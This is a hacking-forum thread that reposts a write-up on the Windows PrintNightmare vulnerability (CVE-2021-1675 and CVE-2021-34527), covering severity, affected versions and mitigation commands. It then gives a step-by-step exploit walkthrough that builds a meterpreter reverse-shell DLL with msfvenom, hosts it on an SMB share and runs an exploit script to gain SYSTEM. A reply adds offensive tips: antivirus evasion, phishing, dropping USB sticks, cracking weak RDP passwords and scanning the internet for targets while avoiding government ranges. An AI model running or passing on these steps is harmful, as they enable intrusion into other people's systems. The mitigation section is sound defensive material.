PrintNightmare Vulnerability | CVE 2021-1675 & CVE-2021-34527
#1
PrintNightmare Vulnerability | CVE 2021-1675 & CVE-2021-34527

Source: Safe Security
Author(s): Divya Bora, Mayank Dholia, Siddhi Verma
Contents
INTRODUCTION
Quote:Originally thought to be a local privilege escalation vulnerability in the Windows Print Spooler, identified as CVE-2021-1675 and patched during Microsoft's June Patch. Microsoft increased the severity of this issue on June 21 as well as reclassifying it as a 'remote code execution' (RCE) threat. This RCE vulnerability has been assigned a new identifier, CVE-2021-34527.

Print Spooler:
Print Spooler is a native, built-in Windows service which is default-enabled on Windows machines to manage printers and print servers, and is therefore prevalent throughout enterprise IT estates.

Print Spooler service:
Monitoring the spool service, spoolsv.exe, may lead to the identification of suspicious executions such as rundll32.exe being spawned to load a malicious DLL and/or Windows utilities being executed as part of some privilege escalation or nefarious information gathering process.

Elevation of Privilege Vulnerability:
It can be defined as an attack that involves gaining access to the privilege beyond what is intended for the user. Having been upgraded from a local elevation of privilege vulnerability to a remote code execution (RCE) threat, exploitation requires the threat actor to have access to a domain-connected user account within the target network.

Print-Nightmare:
Print Nightmare is a bug in the Windows spooler service that has an authorization bypass bug using which the attacker is able to install printer driver with remote procedure call function known as RpcAddPrinterDriverEx() and run the code on a Microsoft Windows system as the local SYSTEM user. An attacker could then use that access to create new accounts, attempt to install programs; view, change, or delete data; or create new accounts with full user rights.
VULNERABILITY SEVERITY
CVSS v3:
Base ScoreVectorImpact ScoreExploitability ScoreSeverity
8.8CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H5.92.8HIGH

Scope of Impact:
Microsoft report that 'all versions of Windows' are affected, across multiple architectures and releases, with the following being explicitly listed:
  • Windows Server 2008 SP2 (32-bit & x64) (including Server Core installation)
  • Windows Server 2008 R2 SP1 (x64) (including Server Core installation)
  • Windows Server 2012 (including Server Core installation)
  • Windows Server 2012 R2 (including Server Core installation)
  • Windows Server 2016 (including Server Core installation)
  • Windows Server 2019 (including Server Core installation)
  • Windows Server, versions 1909, 2004 & 20H2 (Server Core installation)
  • Windows 7 SP1 (32-bit & x64)
  • Windows 8.1 (32-bit & x64)
  • Windows RT 8.1
  • Windows 10 (32-bit & x64)
  • Windows 10, version 1607 (32-bit & x64)
  • Windows 10, versions 1809, 1909, 2004, 20H2 & 21H1 (32-bit, ARM64 & x64)
MITIGATION
In order to determine whether the Print Spooler service is running or not we will use the following command:
Code:
Get-Service -Name Spooler

If the Print Spooler is running or if the service is not set to disabled, select one of the following options to either disable the Print Spooler service, or to Disable inbound remote printing through Group Policy:

Option 1 - Disable the Print Spooler service
Use the following PowerShell commands (recommendation from Microsoft):
Code:
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

or Disable Spooler service using registry:
Code:
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t
REG_DWORD /d "4" /f

or Uninstall Print-Services:
Code:
Uninstall-WindowsFeature Print-Services
This will disable the ability to print both locally and remotely.

Option 2 - Disable inbound remote printing through Group Policy
You can also configure the settings via Group Policy as follows:
Code [No Highlight]:

Computer Configuration / Administrative Templates / Printers

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.

This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.

Option 3 - Install Windows Security Update
In order to fully mitigate this vulnerability one must delete all shadow copies of your system volume after installing this security update.

Option 4 - Restrict content access
Restrict the access to the content of “%windir%\system32\config” use Command:

Command Prompt (Run as administrator):
Code:
icacls %windir%\system32\config\*.* /inheritance:e

Windows PowerShell (Run as administrator):
Code:
icacls $env:windir\system32\config\*.* /inheritance:e

Delete Volume Shadow Copy Service (VSS) shadow copies Identify if Shadow volumes exist with either:

Command Prompt or PowerShell (Run as administrator):
Code:
vssadmin list shadows

Delete any Shadow volumes and System Restore points that existed before restricting access to the contents of %windir%\system32\config
EXPLOIT IMPLEMENTATION
Attack Scenario:
We will be looking at a scenario with a target machine running a vulnerable Windows service i.e. PrintSpooler by creating a virtual environment using VMWARE.

In this scenario, we will use PrintNightmare exploit to get Remote Code Execution (RCE) on the victim’s machine. We will use a vulnerable DLL file to exploit the vulnerability of the PrintSpooler’s service in Windows.

For this practical we will need:
  • A target machine with a vulnerable Windows version installed (A system with at least one shadow copy).
  • The target machine should have PrintSpooler service up and running.
  • A Kali Linux machine to access the Target system and exploit the vulnerability.
EXPLOITATION
  1. Checking the state of vulnerable application i.e, PrintSpooler. Even though PrintSpooler is an inbuilt windows system application, there are chances that the application may be disabled. So run the following command on the victim’s powershell to check if the service is running:
    Code:
    Get-Service -Name Spooler

    [Image: byyelc.PNG]
    Note: If the service is not running then we can use following command to start it:
    Code:
    Start-Service -Name Spooler

  2. Download the exploitation script. The exploit is publicly available on the internet, you can use the following git repository to download the script: https://github.com/nemo-wq/PrintNightmar...2021-34527

    [Image: exgkxn.PNG]

  3. Making the reverse shell DLL file using msfvenom. We require an arbitrary DLL file which will be executed by the Print Spooler Service, due to the bug present in that service (to gain the system access).

    Code:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<attacker listening port> -f dll -o output_file.dll
    [Image: gaylip.PNG]

  4. Start the SMB Server. To get the DLL file executed by the Print Spooler Service on the victim, we need to make it accessible by hosting it on the network. For that we can use SMB Server.

    Code:
    python3 smbserver.py share /path of the dll/ -smb2support
    [Image: oamfai.PNG]

    Note: Make sure the SMB server is configured correctly for the anonymous access (You can refer to the git repository mentioned in Step 2).

    To get the smbserver.py file, you need to install impacket from the following repository: https://github.com/cube0x0/impacket

  5. Start the reverse listener on the attacker machine. Since we are using the meterpreter payload in the demonstration, we need to start a listener in msfconsole (You can also use netcat if you are using a simple shell payload ).

    Set the LPORT , LHOST and payload in the msf and run the listener.

    [Image: cwyecm.PNG]

  6. To execute the exploit use the following command:

    Code:
    python3 exploit.py [domain/]username:”password”@victim_ip ‘\\attacker_ip\share\evil.dll’
    [Image: jktgir.PNG]

    Note: We require domain user credentials to execute this exploit.

    If you are getting any errors, make sure your smb server is configured correctly.

  7. Get the reverse connection on the listener. After performing the steps correctly as demonstrated, you will get a reverse connection (in our case it is a meterpreter connection).

    [Image: hzydsw.PNG]

Result:

Acquired NT Authority\SYSTEM access of our target machine, which is the most powerful account on a Windows local instance.
[Image: kwwmwf.PNG]
Reply
#2
Extra resources
Metasploit fundementals: https://www.offensive-security.com/metas...damentals/
AV Bypass with Metasploit Templates and Custom Binaries: https://www.ired.team/offensive-security...-templates
There's also plenty of other good threads on AV evasion in the malware section & reverse engineering section.

Ideas to aquire windows credentials for domains/servers:
- Phising/Spear Phising
- Physical attacks: For example mimikatz, dropping around USBs in office lobbies/parking lots, sending disguides USBs (See: https://www.zdnet.com/article/fbi-cyberc...ansomware/)
- Cracking open RDP access. Many admins use bad/common passwords. (Google for more info) but beware of honeypots.
- etc

Where to find RDP/Windows servers:
- Scan the internet with tools such as Nmap or Masscan (Beware of dangerous govt IP ranges though). Probably a good idea to look up default ports for RDPs in that case too.
- Use OSINT search enginer such as Shodan.
- etc

Just throwing out some ideas.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Need help exploiting CVE-2010-4345 using exim4_string_format on a virtual server 3thos 1 897 01-17-2022, 07:45 PM
Last Post: mendax
  [Podcast] D0rkerDevil talks about bug bounties & cve's LaZr4us 0 8,819 06-13-2020, 05:24 AM
Last Post: LaZr4us
  Proof of concept for CVE-2017-2362? lunorian 1 11,883 05-29-2018, 03:29 AM
Last Post: ekultek
  Proof of Concept for CVE-2018-4160 ekultek 0 9,887 05-08-2018, 08:46 PM
Last Post: ekultek